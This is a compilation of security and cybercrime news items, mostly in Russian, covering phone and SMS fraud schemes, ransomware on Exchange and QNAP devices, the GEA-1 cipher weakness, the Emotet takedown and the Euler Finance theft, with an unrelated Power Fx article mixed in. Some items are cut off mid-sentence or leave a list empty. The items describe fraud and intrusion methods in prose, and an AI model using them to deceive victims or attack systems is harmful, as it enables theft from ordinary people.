китайского языка, но также предположительно имеют связи с российскими
хакерами. Эксперты также добавляют, что атаки не ограничиваются конкретным
сектором, а направлены на розничную торговлю, правительство, IT-услуги и т. д.
Жертвами кампании являются Канада, Великобритания и США.
«Злоумышленники активно используют уязвимые машины Windows Server через модули
ключей IKE и AuthIP IPsec, экспортируя эту ошибку. Пользователям рекомендуется
как можно скорее установить патчи и исправления, чтобы снизить риск», —
сообщили исследователи Cyfirma.
Схему мошенничества разоблачили сотрудники управления противодействия киберпреступлениям в Харьковской области совместно со следственным отделом Харьковского районного управления полиции.
Установлено, что трое местных жителей привлекли к работе около 40 операторов, для которых разработали детальные инструкции мошеннических действий. На хакерских форумах они покупали базы данных клиентов банков, которым звонили работники call-центра под видом работников финучреждения. Гражданам сообщали, что с их банковской карты якобы осуществляются подозрительные транзакции или о том, что поступила заявка на смену финансового номера. Операторы также уверяли пострадавших, что информация о якобы мошеннических действиях будет передана в местную полицию.
После этого другой работник call-центра звонил уже под видом полицейского. Для убеждения потерпевших злоумышленники использовали "sip-телефонию" и подменяли номера на те, что были указаны на официальных сайтах полиции. Псевдополицейский сообщал, что для блокирования мошеннических действий необходимо сообщить ему код из SMS-сообщения. Как только граждане называли код
По предварительным подсчетам, общая сумма убытков составляет миллион гривен.
В офисе, где располагался сall-центр, работники полиции провели обыск. Изъято более 40 компьютеров и такое же количество телефонов. Обыски проводились с привлечением сотрудников полка полиции особого назначения полиции Харьковщины.
Фигурантам объявлено о подозрении по ч. 3 ст. 190 (Мошенничество) Уголовного кодекса Украины. Подозреваемым может грозить до восьми лет лишения свободы. Решается вопрос об избрании меры пресечения в виде содержания под стражей. Следственные действия продолжаются.
Процессуальное руководство осуществляет Харьковская окружная прокуратура.
Microsoft today announced Power Fx, a new low-code language that takes its cues from Excel formulas. Power Fx will become the standard for writing logic customization across Microsoft’s own low-code Power Platform, but since the company is [open-sourcing the language](https://github.com/microsoft/power- fx), Microsoft also hopes that others will implement it as well and that it will become the de facto standard for these kinds of use cases.
Since Power Platform itself targets business users more so than professional developers, it feels like a smart move to leverage their existing knowledge of Excel and their familiarity with Excel formulas to get started.
“We have this long history of programming languages and something really interesting happened over the last 15 years, which is programming languages became free, they became open source and they became community-driven,” Charles Lamanna, the CVP of Power Platform engineering at Microsoft, told me. He noted that even internal languages like C#, TypeScript or Google’s Go are good examples for this.
“That’s been an ongoing trend. And what’s interesting is: that’s all for pro devs and coders. If we go back and look at the low-code/no-code space, there actually are programming languages, like the Excel programming language, or in every low-code/no-code platform has its own programming language. But those aren’t open, those aren’t portable, and those are community-driven,” Lamanna explained.
Microsoft says the language was developed by a team led by Vijay Mital, Robin Abraham, Shon Katzenberger and Darryl Rubin. Beyond Excel, the team also took inspiration from tools and languages like Pascal, Mathematica and Miranda, a functional programming language developed in the 1980s.
Microsoft plans to bring Power Fx to all of its low-code platforms, but given the focus on community, it’ll start making appearances in Power Automate, Power Virtual Agents and elsewhere soon.
[](https://techcrunch.com/wp- content/uploads/2021/03/powerfx_language.png)
But the team clearly hopes that others will adopt it as well. Low-code developers will see it pop up in the formula bars of products like Power Apps Studio, but more sophisticated users will also be able to use it to go to Visual Studio Code and build more complex applications with it.
As the team noted, it focused on not just making the language Excel-like but also having it behave like Excel — or like a REPL, for you high-code programmers out there. That means formulas are declarative and instantly recalculate as developers update their code.
Most low-code/no-code tools these days offer an escape hatch to allow users to either extend their apps with more sophisticated code or have their tool export the entire code base. Because at the end of the day, you can only take these tools so far. By default, they are built to support a wide range of scenarios, but since every company has its own way of doing things, they can’t cover every use case.
“We imagine that probably the majority of developers — and I say ‘developers’ as business users to coders that use Power Platform — will ultimately drop into writing these formulas in some form. The idea is that on that first day that you get started with Power Platform, we’re not going to write any formulas, right? […] It’s a macro recorder, it’s templates. Same thing for Power Apps: it’s pure visual, drag and drop, you don’t write a single formula. But what’s great about Power Platform, in week number two, when you’re using this thing, you learn a little bit more sophistication. You start to use a little bit more of the advanced capabilities. And before you know it, you actually have professionals who are Power Platform or low-code developers because they’re able to go down that spectrum of capability.”
Днем 3 января в греческом городе Каливия двое неизвестных похитили 29-летнего программиста с целью кражи криптовалюты. Об этом сообщают местные СМИ.
Пострадавшего остановили под предлогом проведения полицейской проверки. Затем на него надели наручники, посадили в автомобиль и вывезли в лес.
Там злоумышленники отобрали у жертвы два мобильных телефона, кошелек, ключи от дома, заставили назвать пин-коды от банковских карт и разблокировать доступ к приложению криптовалютного кошелька. После этого похитители перевели на свой счет активы на сумму €3000.
[](https://forklog.com/wp- content/uploads/anavisos_29xronos_arthro.webp)
Программиста связали изолентой и приковали наручниками к рулю автомобиля, однако ему удалось освободиться. Он добрался до ближайшей заправки, вызвал полицию и уведомил родных о случившемся.
По данным СМИ, одного из подозреваемых, 25-летнего молдаванина, удалось задержать.
sc: forklog.com/news/smi-v-gretsii-programmista-pohitili-iz-za-kriptovalyuty
Москвич лишился 50 тысяч долларов при попытке обменять их на рубли. 22-летний парень нашёл клиентов через мессенджер и решил встретиться в 22:00 в офисном помещении, где днём проводят курсы криптоторговли.
Однако потенциальные клиенты напали на молодого человека, отобрали у него 4 млн 200 тысяч рублей и скрылись. По информации источника, деньги — $50 тыс. (4,2 млн рублей) пострадавшему передал дедушка
В сети появились объявления о продаже роутера, якобы имеющего функцию майнинга криптовалют.
Как стало известно журналистам, необычный роутер рекламировала неизвестная компания под названием TP-Link ASIC. В пресс-релизе сообщалось, что девайс позволяет организовывать беспроводную сеть, поддерживает новую технологию Wi- Fi 7, а также может майнить криптовалюту во время работы. Авторы анонса отметили, что новый продукт является более мощным, чем популярная среди майнеров видеокарта RTX 4090.
Роутер от TP-Link ASIC оценили в 1440 долларов. Позже авторы издания связались с представителями производителем сетевого оборудования TP-Link, и тот подтвердил, что не имеет отношения к роутеру и подразделению TP-Link ASIC. На основании этого журналисты сделали вывод, что неизвестные мошенники придумали фейковую технологию и просили за это деньги.
Специалисты отметили, что реклама несуществующего роутера была сделана очень качественно. В частности, ее авторы подробно описали характеристики устройства — сообщив, что аппарат имеет активное охлаждение и потребляет 1200 ватт при полной нагрузке.
source: tomshardware.com/news/new-tp-link-router-reportedly-mines-crypto- faster-than-rtx-4090
ИБ-специалист Маркус Хатчинс (Marcus Hutchins) из компании Kryptos Logic заметил, что уязвимые перед ProxyLogon серверы Microsoft Exchange теперь атакует еще один шифровальщик — Black Kingdom. Впервые эта малварь была обнаружена в июне прошлого года, когда использовала уязвимости в продуктах Pulse Secure VPN для взлома корпоративных сетей и последующей установки шифровальщика.
Напомню, что ранее уязвимые серверы Microsoft Exchange атаковал шифровальщик DearCry.
Хатчинс писал, что операторы вымогателя получают доступ к серверам Exchange и оставляют там записку с требованием выкупа, утверждая, что зашифровали файлы жертвы. Хакеры требуют выкуп в размере 10 000 долларов за ключ для дешифрования данных. Однако специалист сообщал, что Black Kingdom не может зашифровать файлы жертв, по сути, оставляя серверы нетронутыми.
__https://twitter.com/x/status/1373634465340264451
К сожалению, хакеры быстро осознали свою ошибку. По данным специалистов компаний [Arete IR](https://www.areteir.com/black-kingdom-returns-to-exploit- zero-day-vulnerabilities-in-unpatched-microsoft-exchange-servers/), Sophos и [Speartip](https://www.speartip.com/resources/black-kingdom-ransomware- exploiting-exchange-vulnerabilities/) в начале текущей недели атаки изменились, и теперь малварь действительно шифрует файлы. Увы, это подтверждает и известный ИБ-эксперт Кевин Бомонт, аналитик угроз в Microsoft.
__https://twitter.com/x/status/1374327687901220865
Количество пострадавших пока неизвестно, однако собственные источники издания [The Record](https://therecord.media/microsoft-exchange-servers-targeted-by- second-ransomware-group/) утверждают, что пострадала как минимум одна крупная компания в сфере автомобильной промышленности.
Майкл Гиллеспи, создатель ID Ransomware, сообщил журналистам, что пострадали как минимум 30 компаний, и они находятся в США, Канаде, Австрии, Швейцарии, России, Франции, Израиле, Великобритании, Италии, Германии, Греции, Австралии и Хорватии.
В начале марта 2021 года инженеры Microsoft выпустили внеплановые патчи для
четырех уязвимостей в почтовом
сервере Exchange, которым исследователи дали общее название
ProxyLogon
([CVE-2021-26855](https://msrc.microsoft.com/update-
guide/vulnerability/CVE-2021-26855),
[CVE-2021-26857](https://msrc.microsoft.com/update-
guide/vulnerability/CVE-2021-26857),
[CVE-2021-26858](https://msrc.microsoft.com/update-
guide/vulnerability/CVE-2021-26858) и
[CVE-2021-27065](https://msrc.microsoft.com/update-
guide/vulnerability/CVE-2021-27065)).
Эти уязвимости можно объединить в цепочку, а их эксплуатация позволит
злоумышленнику пройти аутентификацию на сервере Exchange, получить права
администратора, установить малварь и похитить данные.
Атаками на уязвимые серверы занимаются более десяти хак-групп, разворачивая на
серверах веб-шеллы, майнеры и шифровальщики.
Между тем, специалисты Microsoft сообщают, что борьба с ProxyLogon идет полным ходом. В минувшие выходные Microsoft заявила, что уже примерно 92% всех серверов Exchange получили патчи и теперь защищены от атак злоумышленников. Так, по словам производителя ОС, из 400 000 развернутых по всему миру серверов Exchange, лишь 30 000 все еще уязвимы для атак.
[](https://xakep.ru/wp- content/uploads/2021/03/344015/MSFT-chart-Exchange-evolution.jpg)
Таким образом, теперь количество проблемных серверов снизилось на 56% по сравнению с цифрой 69 500, которую Microsoft называла неделей ранее.
Источник: xakep.ru/2021/03/24/black-kingdom/
В Украине киберполиция накрыла мошенников которые присвоили свыше 2 млн гривен с помощью фишинга.
Первая группа из 13 человек имела свой чат в «Telegram», где ТС разместил
инструкции и бота, который генерировал фишинговые ссылки. В свою очередь,
воркеры рассылали ссылки в мессенджерах, выдавая их за предложение по
оформлению выплат и получению средств за проданный товар («OLX» 2.0).
Жертвы вводили данные своих карт, после чего происходили списания. Организатор
проекта, проживающий в Харьковской области лично принимал средства мамонтов на
дроп-карты и налил их.
Аналогичным образом работала и вторая тима. В ней находилось три человека из Днепропетровской области.
На данный момент открыты уголовные производства по ч. 1, 2 ст. 255, ч. 4 ст. 190 УК. Фигурантам грозит до 12 лет заключения с конфискацией имущества.
source: cyberpolice.gov.ua/news/kiberpolicziya-xarkivshhyny-vykryla- uchasnykiv-dvox-zlochynnyx-ugrupovan-u-pryvlasnenni-majzhe--mln-grn-za- dopomogoyu-fishyngu-4425
Группа ученых из нескольких европейских университетов опубликовала доклад, который многие ИБ-эксперты и СМИ уже назвали сенсационным. Дело в том, что согласно этому исследованию, два старых алгоритма шифрования, созданные в 1990-х и 2000-х годах, но все еще применяющиеся в мобильных сетях, уязвимы и позволяют следить интернет-трафиком пользователей. В первую очередь речь идет об алгоритме GEA-1, который был создан и использовался много лет назад, когда были приняты стандарты GPRS в сетях 2G.
Хуже того, исследователи пишут, что вероятность случайного возникновения подобной уязвимости чрезвычайно мала. То есть ученые предположили, что алгоритм был ослаблен умышленно, чтобы предоставить правоохранительным органам «лазейку» и соблюсти законы, ограничивающие экспорт надежных инструментов шифрования. После публикации документа разработчики алгоритма подтвердили эту теорию.
«Согласно нашему экспериментальному анализу, угадать шесть выигрышных номеров в немецкой лотерее дважды подряд примерно так же вероятно, как и случайно получить такие свойства ключа», — пишет один из авторов доклада, Кристоф Байерле из Рурского университета в Бохуме, Германия.
Исследователи объясняют, что в их руки попали сразу два старых алгоритма шифрования, GEA-1 и GEA-2, которые являются проприетарными, то есть обычно недоступны для широкой публики и посторонних. Изучив их, эксперты пришли к выводу, что алгоритмы уязвимы для атак, позволяющих расшифровать весь трафик пользователей.
Чтобы отреверсить GEA-1, по сути, ученым пришлось самим создавать аналогичный алгоритм шифрования, используя генератор случайных чисел, часто применяемый в криптографии. Но даже таким образом они не смогли создать такую же слабую схему шифрования, как в оригинале.
«После миллиона попыток мы даже близко не подошли к такому слабому образцу как оригинал. Это означает, что слабость в GEA-1 вряд ли возникла случайно, то есть уровень безопасности в 40 бит был обусловлен правилами регулирования экспорта, — гласит документ. — Из-за этих политических требований миллионы пользователей, похоже, много лет были плохо защищены во время серфинга в сети».
Проблема GEA-1, разработанного еще в 1998 году, заключается в том, что он обеспечивает только 40-битную защиту. По мнению исследователей, это позволяет злоумышленнику, который может перехватить трафик, воссоздать ключ и расшифровать все данные.
Представитель Европейского института по стандартизации в области телекоммуникаций (ETSI), разработавшего алгоритм GEA-1, [признал в беседе с журналистами Vice Motherboard](https://www.vice.com/en/article/4avnan/bombshell-report-finds- phone-network-encryption-was-deliberately-weakened), что алгоритм действительно имеет слабые места, и это было сделано умышлено:
«Мы следовали правилам: соблюдали правила экспортного контроля, которые ограничивали возможности GEA-1».
При этом «потомок» GEA-1 — GEA-2, уже не имел столь вопиющих проблем. Фактически, представитель ETSI объяснил, что во времена создания GEA-2, правила экспортного контроля уже были ослаблены. Тем не менее, исследователи сумели расшифровать трафик, защищенный GEA-2, применив для этого более сложную атаку, и пришли к выводу, что GEA-2 тоже «не обеспечивает достаточный для сегодняшних стандартов уровень безопасности».
Остается утешаться лишь тем, что в настоящее время GEA-1 и GEA-2 распространены не слишком широко, так как давно приняты новые стандарты для сетей 3G и 4G. В 2013 году ETSI и вовсе запретил операторам использовать алгоритм GEA-1, однако исследователи пишут, что, невзирая на это, GEA-1 и GEA-2 применяются по сей день, ведь GPRS до сих пор используется в качестве запасного варианта связи во многих странах и сетях.
«В большинстве стран риск не очень высок и значительно ниже, чем в начале 2000-х годов, поскольку сегодня в ходу GEA-3 и GEA-4. Но телефоны по-прежнему поддерживают GEA-1. Существуют сценарии, в которых мобильный телефон можно обманом заставить использовать GEA-1 даже сегодня», — говорит один из авторов исследования Ховард Раддум.
В качестве доказательства этих слов эксперты протестировали несколько современных смартфонов на базе Android и iOS, чтобы понять, могут ли они поддерживать старые и уязвимые алгоритмы. Увы, эксперимент показал, что GEA-1 и GEA-2 все еще поддерживаются. Также стоит добавить, что многие IoT- устройства тоже по-прежнему используют 2G-модемы и тоже могут быть уязвимы.
Emotet, one of the most dangerous email spam botnets in recent history, is being uninstalled today from all infected devices with the help of a malware module delivered in January by law enforcement.
The botnet's takedown is the result of an international law enforcement action
that allowed investigators to take control of the Emotet's servers and disrupt
the malware's operation.
Emotet was used by the TA542 threat group (aka Mummy
Spider) to
deploy second-stage malware payloads, including QBot and Trickbot, onto its
victims' compromised computers.
TA542's attacks usually led to full network compromise and the deployment of ransomware payloads on all infected systems, including ProLock or Egregor by Qbot, and Ryuk and Conti by TrickBot.
After the takedown operation, law enforcement pushed a new configuration to active Emotet infections so that the malware would begin to use command and control servers controlled by the Bundeskriminalamt, Germany's federal police agency.
Law enforcement then distributed a new Emotet module in the form of a 32-bit EmotetLoader.dll to all infected systems that will automatically uninstall the malware on April 25th, 2021.
Malwarebytes security researchers Jérôme Segura and Hasherezade took a closer look at the uninstaller module delivered by law enforcement-controlled to Emotet servers.
After changing the system clock on a test machine to trigger the module, they
found that it only deletes associated Windows services, autorun Registry keys,
and then exits the process, leaving everything else on the compromised devices
untouched.
"For this type of approach to be successful over time, it will be important to
have as many eyes as possible on these updates and, if possible, the law
enforcement agencies involved should release these updates to the open
internet so analysts can make sure nothing unwanted is being slipped in,"
Marcin Kleczynski, CEO of Malwarebytes, told bleepingcomputer[.]
"That all said, we view this specific instance as a unique situation and encourage our industry partners to view this as an isolated event that required a special solution and not as an opportunity to set policy moving forward."
In January, when law enforcement took down Emotet, BleepingComputer was told by Europol that the German Bundeskriminalamt (BKA) federal police agency was responsible for creating and pushing the uninstall module.
"Within the framework of the criminal procedural measures carried out at international level, the Bundeskriminalamt has arranged for the malware Emotet to be quarantined in the computer systems affected," Bundeskriminalamt told bleepingcomputer[.]
In a January 28th press release, the US Department of Justice (DOJ) also confirmed that the Bundeskriminalamt pushed the uninstaller module to Emotet- infected computers.
"Foreign law enforcement, working in collaboration with the FBI, replaced Emotet malware on servers located in their jurisdiction with a file created by law enforcement," the DOJ said.
"The law enforcement file does not remediate other malware that was already installed on the infected computer through Emotet; instead, it is designed to prevent additional malware from being installed on the infected computer by untethering the victim computer from the botnet."
BleepingComputer was told in January by the Bundeskriminalamt that the delay in uninstalling was for seizing evidence and clean the machines of the malware.
An identification of the systems affected is necessary in order to seize evidence and to enable the users concerned to carry out a complete system clean-up to prevent further offences. For this purpose, the communication parameters of the software have been adjusted in a way that the victim systems no longer communicate with the infrastructure of the offenders but with an infrastructure created for the seizure of evidence. -- Bundeskriminalamt
Click to expand...
"Please understand that we cannot provide any further information as the investigations are still ongoing," the Bundeskriminalamt told BleepingComputer when asked for more info.
When BleepingComputer reached out again for comment about today's operation, we did not receive a response.
The FBI also declined to comment when asked this week if the Emotet removal operation from devices located in the USA is still planned to occur on Sunday, April 25th.
Earlier this month, FBI coordinated a court-approved operation to remove web shells from US-based Microsoft Exchange servers compromised using ProxyLogon exploits without first notifying the servers' owners.
The FBI said that it only removed web shells and did not apply security updates or removed other malware that threat actors may have deployed on the servers.
Из-за неправильной конфигурации USB-носители станут источником массовых
фишинговых атак.
Исследовательская группа Cybernews обнаружила, что нидерландская компания-
разработчик ПО для шифрования ENC Security 1,5 года сливала свои файлы
конфигурации и сертификаты. Компания заявила, что проблема возникла из-за
неправильной конфигурации стороннего поставщика, который уже исправил ее сразу
после получения уведомления.
«Данные, которые просачивались около 1,5 лет, — это золотая жила для злоумышленников», — сказал исследователь Cybernews Мартинас Варейкис.
Утекшие данные включали:
Данные были доступны с 27 мая 2021 года по 9 ноября 2022 года. Сервер был
закрыт после того, как Cybernews сообщил об уязвимости в ENC Security.

По словам Варейкиса, утечка информации вызывает беспокойство, поскольку
злоумышленники могут использовать эти данные для различных кибератак — от
фишинга до вымогательских атак.
Например, каналы продаж могут использоваться для фишинга клиентов путем
отправки им поддельных счетов-фактур или распространения вредоносного ПО через
доверенные адреса электронной почты.
API-Ключи Mailchimp позволяют с настоящей электронной почты компании создавать
массовые маркетинговые рассылки и «собирать» потенциальных клиентов.
А файлы «.pem» (формат файла для хранения и отправки криптографических ключей
и сертификатов) могут открыть доступ к серверу или даже привести к захвату
сервера. А API-ключи платежей могут раскрыть конфиденциальную информацию о
клиенте.
USB-ключи Sony, Lexar, Sandisk и другие устройства хранения поставляются с
программой для шифрования данных, разработанной компанией ENC Security.
Нидерландская компания с 12 млн. пользователей по всему миру предлагает
решения «защиты данных военного уровня» с помощью своего популярного ПО для
шифрования DataVault. ECN Security сообщает, что ее продукт загружается более
2000 раз в месяц.
Заработанные деньги группа отправляла бандитам в тюрьму и оплачивала услуги адвокатов.
Испанская полиция арестовала 40 человек по подозрению в причастности к крупной преступной группировке, которая заработала более €700 000 на жертвах фишинга.
Среди 40 задержанных были двое хакеров и 15 подозреваемых членов группы «Trinitarios», которым были предъявлены обвинения в принадлежности к преступной организации, банковском мошенничестве, подделке документов, краже личных данных и отмывании денег.
По данным следствия, группа финансировалась за счет фишинга и банковского мошенничества, которое использовалось для покупки наркотиков и оружия, оплаты услуг адвокатов для других членов группы, которые сидят в тюрьме, а также для передачи заработанных денег непосредственно членам банды за решетку.
Предполагаемые хакеры отправляли фишинговые SMS-сообщения жертвам от имени банка. В смс мошенники утверждали, что возникла проблема безопасности, и требовали перейти по вредоносной ссылке для её решения.
Перейдя по ссылке, жертва попадала на поддельную страницу входа в банк, где она вводила свои учетные данные. Затем хакеры использовали учетные данные для доступа к реальным счетам, оформляя кредиты и привязывая карты жертв к виртуальным кошелькам на своих телефонах.
Затем через украденные карты киберпреступники приобретали криптовалюту, которая потом обменивалась на фиатную валюту и помещалась в «общий ящик» для последующего использования всеми участниками группы.
Группа также монетизировала украденные банковские реквизиты, направляя обширную сеть денежных мулов для «обналичивания» в банкоматах или получения средств посредством банковского перевода, а также совершала ложные покупки через фиктивные косметические онлайн-компании через POS-терминалы.
Часть средств была отправлена за границу и даже использована для покупки недвижимости в Доминиканской Республике. В ходе операции было проведено 13 обысков домов в Мадриде, Севилье и Гвадалахаре, где был обнаружен список из 300 000 жертв фишинга, а также €5000 наличными, компьютерное оборудование и устройства для взлома замков.
source: policia.es/_es/comunicacion_prensa_detalle.php?ID=15682
Администрация США намерена принимать меры в отношении других стран, в том числе России, если с их территории хакеры осуществляют атаки.
Зампомощника президента США по нацбезопасности Энн Нюбергер заявила о том, что американские власти намерены и дальше привлекать к ответственности хакеров, в том числе российских, независимо от статуса диалога, который ведется с РФ по вопросам кибербезопасности.
Нюбергер напомнила о том, что на фоне спецоперации на Украине Вашингтон поставил на паузу двусторонний кибердиалог с Москвой.
«Мы, безусловно, продолжаем призывать к ответу Россию и другие страны за кибератаки, которые осуществляются с их территории вне зависимости от того, ведется диалог или нет», — приводит издание комментарий представителя Белого дома.
Таким образом Нюбергер ответила на вопрос, заинтересована ли американская сторона в кибердиалоге, и как его отсутствие может сказываться на безопасности США в сфере кибербезопасности.
При этом представитель Белого дома не уточнила, хочет ли администрация США возобновления данных контактов и как их отсутствие сказывается на безопасности страны в киберсфере.
source: tass.ru/mezhdunarodnaya-panorama/16360823
ИБ-исследователи и инженеры Qnap предупредили о появлении нового шифровальщика, атакующего NAS компании. Согласно заявлению самих хакеров, малварь DeadBolt шифрует устройства, используя 0-day уязвимость.
Bleeping Computer сообщает, что атаки начались 25 января, когда владельцы устройств Qnap стали обнаруживать, что их файлы зашифрованы, а имена файлов дополнены расширением .deadbolt. Изданию известно по меньшей мере о 15 жертвах новой малвари. Вместо записки с требованием выкупа, которую обычно помещают в каждой папке на устройстве, послание хакеров размещается прямо на странице входа в систему, как показано ниже.
Жертву информируют о том, что она должна перевести 0,03 биткоина (приблизительно 1100 долларов США) на определенный биткоин-адрес, который уникален для каждого пострадавшего. После платежа злоумышленники сообщают, что они совершат ответную транзакцию по тому же адресу, которая будет включать в себя ключ для дешифрования данных. Журналисты подчеркивают, что в настоящее время нет никаких подтверждений тому, что выплата выкупа вообще приведет к получению ключа, а пользователи смогут расшифровывать свои файлы.
Интересно, что в записке с требованием выкупа есть отдельная ссылка, озаглавленная «Важное сообщение для Qnap», при нажатии на которую отображается сообщение для разработчиков. Авторы малвари DeadBolt пишут, что готовы раскрыть полную информацию об используемой ими уязвимости нулевого дня, если компания заплатит им 5 биткоинов (примерно 184 000 долларов США). Также они сообщают, что готовы продать мастер-ключ, который поможет расшифровать файлы всех жертв, и информацию о 0-day за 50 биткоинов, то есть почти за 1,85 миллиона долларов США.
Вымогатели подчеркивают, что связаться с ними можно только через биткоин- платежи.
Разработчики Qnap уже [подтвердили](https://www.qnap.com/en/security- news/2022/take-immediate-actions-to-stop-your-nas-from-exposing-to-the- internet-and-fight-against-ransomware-together) информацию об атаках DeadBolt. Компания предупреждает пользователей:
«DeadBolt атакует все NAS, подключенные к интернету без какой-либо защиты, и шифрует данные пользователей с целью получения выкупа в биткоинах. Ваш NAS, подключенный к интернету, подвергается высокому риску, если на панели управления отображается сообщение “Служба системного администрирования может быть напрямую доступна с внешнего IP-адреса по следующим протоколам: HTTP”».
Пользователям настоятельно рекомендуется обновить QTS до последней доступной версии, а также как можно скорее отключить переадресацию портов на своем маршрутизаторе и функцию UPnP в NAS Qnap.
В минувшие выходные Euler Finance подвергся flash loan атаке, и злоумышленникам удалось похитить криптовалюту на сумму около 197 миллионов долларов по текущему курсу. Атака привела к тому, что стоимость токена Euler (EUL) упала на 44,2% за одну ночь.
Представители Euler Labs сообщили об атаке в понедельник, 13 марта 2023 года. Позже компания опубликовала более развернутое заявление, которое гласит, что инцидентом уже занимаются правоохранительные органы.
«Мы продолжаем расследование незаконного изъятия средств из протокола Euler, произошедшего этим утром. Команда Euler Labs предприняла ряд незамедлительных действий, чтобы попытаться вернуть средства и точно определить, что произошло, в том числе мы связались и поделились информацией с правоохранительными органами, а также работаем с независимыми сторонними аудиторами и специалистами по безопасности, — сообщили разработчики. — Нашим главным приоритетом является возврат средств пользователей, и мы прилагаем для этого все усилия».
Click to expand...
Известно, что инцидент затронул ряд токенов, включая DAI на сумму 8,75 млн долларов, WBTC на 18,5 млн долларов, USDC на 33,85 млн долларов и stETH на 135,8 млн долларов. При этом за кошельком злоумышленника, который используется для хранения украденных средств, наблюдают ИБ- специалисты.
По информации блокчейн-аналитиков [Elliptic](https://hub.elliptic.co/analysis/euler-finance-loses-199-million- in-flash-loan-attack/), взломщики уже отмывают похищенное через попавший под санкции криптовалютный миксер Tornado Cash.
В свою очередь, компания PeckShield предполагает, что взлом Euler был осуществлен благодаря ошибке в системе для пожертвований и ликвидации. В частности, функция donateToReserves не проверяла, что злоумышленник жертвует сверхзалоговую (over-collateralized) сумму, а система ликвидации некорректно проверяла курс конвертации из заемных средств в залоговые активы.
[](https://xakep.ru/wp- content/uploads/2023/03/418500/FrGCkKQaQAE030q.jpg)
Эксперты считают, что в атаке участвовали как минимум два злоумышленника, которые координировали свои действия, как показано на иллюстрации ниже.
[](https://xakep.ru/wp- content/uploads/2023/03/418500/FrGEWPpagAE3fvv.jpg)
Epsilon Red написан на языке Golang и содержит набор уникальных PowerShell- скриптов для подготовки к шифрованию.
Операторы нового вымогательского ПО под названием Red Epsilon используют уязвимости в серверах Microsoft Exchange для взлома компьютерных систем и шифрования данных. Специалисты из ИБ-компании Sophos обнаружили новый вредонос во время расследования атаки на неназванную крупную американскую компанию в сфере гостеприимства. Злоумышленники проникли в корпоративную сеть, используя уязвимости в локальном сервере Microsoft Exchange. Эксперты в настоящее время не знают, эксплуатировали ли хакеры уязвимости ProxyLogon для доступа к устройствам.
Epsilon Red написан на языке Golang (Go) и содержит набор уникальных PowerShell-скриптов, которые подготавливают устройство для процедуры шифрования файлов. Скрипты способны отключать процессы и службы защитных решений, баз данных, программ резервного копирования, приложений Office и почтовых клиентов, удалять Volume Shadow Copies, похищать файл Security Account Manager (SAM) с хешами паролей, удалять логи событий Windows, отключать Защитника Windows, повышать привилегии на системе и пр.
Большинство скриптов пронумерованы от 1 до 12, но есть несколько, которые названы одной буквой. Один из них, c.ps1, похоже, является клоном инструмента тестирования на проникновение Copy-VSS.
После взлома сети хакеры получают доступ к компьютерам через Remote Desktop Protocol (RDP) и используют инструментарий управления Windows (WMI) для установки программного обеспечения и запуска PowerShell-скриптов. Исследователи Sophos заметили, что злоумышленники также устанавливают браузер Tor и копию коммерческого программного обеспечения для операций с удаленными рабочими столами Remote Utilities.
Вымогатель шифрует все данные в целевых папках, добавляя расширение .epsilonred, не щадя исполняемые файлы или DLL-библиотеки, которые могут нарушить работу важных программ или даже операционной системы.
Хотя название и инструменты являются уникальными для данного злоумышленника, записка о выкупе на зараженных компьютерах похожа на записку, которую оставляет группировка REvil. Однако в записке Epsilon Red внесено несколько незначительных грамматических исправлений. Других сходств между программой- вымогателем Epsilon Red и REvil не было выявлено.
По результатам анализа адреса криптовалютного кошелька злоумышленников стало известно, что по крайней мере одна из жертв заплатила 15 мая нынешнего года выкуп в размере 4,29 биткойнов (примерно $210 тыс.).
Федеральный суд присяжных в Лас-Вегасе признал пятерых мужчин виновными в причастности к деятельности Jetflicks, одного из крупных и популярных нелегальных стриминговых сервисов в США. Программисту, который стоял у истоков создания огромного пиратского интернет-сайта, грозит длительный тюремный срок после пяти лет судебных разбирательств и двухнедельного процесса. Этот случай ярко иллюстрирует масштабы правонарушений в сфере интеллектуальной собственности в цифровую эпоху и жестокость наказания, которое ждет виновных.
Судебное дело
Федеральное большое жюри США предъявило обвинение группе лиц, которая, действуя по предварительному сговору нарушила закон об авторском праве, пишет издание The Register. После пяти лет изнурительных судебных разбирательств и двухнедельного процесса, завершившегося недавно, главному разработчику Jetflicks грозит длительное тюремное заключение.
Гражданин Кубы Йоани Вайлант (Yoany Vaillant), которому 43 года, постоянно проживал на территории Соединенных Штатов, играл ключевую роль в работе сайта Jetflicks. Вайлант в свое время утверждал, что на Jetflicks размещено более 183 тыс. эпизодов телевизионных шоу для потоковой передачи и скачивания, это больше, чем в настоящее время на любом из крупных потоковых ИТ-сервисов. Обвиняемый, который был признан виновным по одному пункту обвинения в сговоре с целью совершения уголовного нарушения авторских прав, стал восьмым и последним обвиняемым, осужденным по этому делу. Вайланту грозит возможное лишение свободы на срок до 10 лет, или штраф в размерах, предусмотренных настоящим разделом, или оба наказания, если это деяние является преступлением.
Нелегальная сеть распространения охватывала десятки тысяч американских пользователей, и пиратам было что предложить: известно, что Jetflicks хвастались тем, что имеют в каталоге более 183,2 тыс. тайтлов - в основном, это были эпизоды популярных телесериалов. Jetflicks проработал 12 лет, с момента запуска в 2007 г. и до его закрытия Федеральным бюро расследования (ФБР) в 2019 г. На пике своей популярности сервис предлагал более 10,5 тыс. фильмов и 183 тыс. телесериалов, собранных с легальных платформ (включая Netflix, Hulu и Amazon Prime) с помощью автоматизированных скриптов.
Вайлант как и компания Jetflicks, базировался в Лас-Вегасе, имел 15-летний опыт работы ИТ-разработчиком и владел 27 языками программирования. Он проработал в Jetflicks всего четыре с половиной месяца, но за это время, по словам обвинителей, внес значительный вклад в развитие сайта. В частности, Вайлант исправлял ошибки, связанные с обширными автоматизированными процессами, которые использовались на Jetflicks, такими как загрузка, обработка, синхронизация, выгрузка и потоковая передача каталога сайта.
Йоани Вайлант был одним из восьми человек, которым в 2019 г. были предъявлены обвинения в том, что они сыграли ключевую роль в успехе Jetflicks, включая двух других разработчиков программного обеспечения (ПО), Дэррила Поло (Darryl Polo) и Луиса Вилларино (Luis Villarino). Поло был отправлен в тюрьму на четыре года и девять месяцев, а Вилларино на один год и один день.
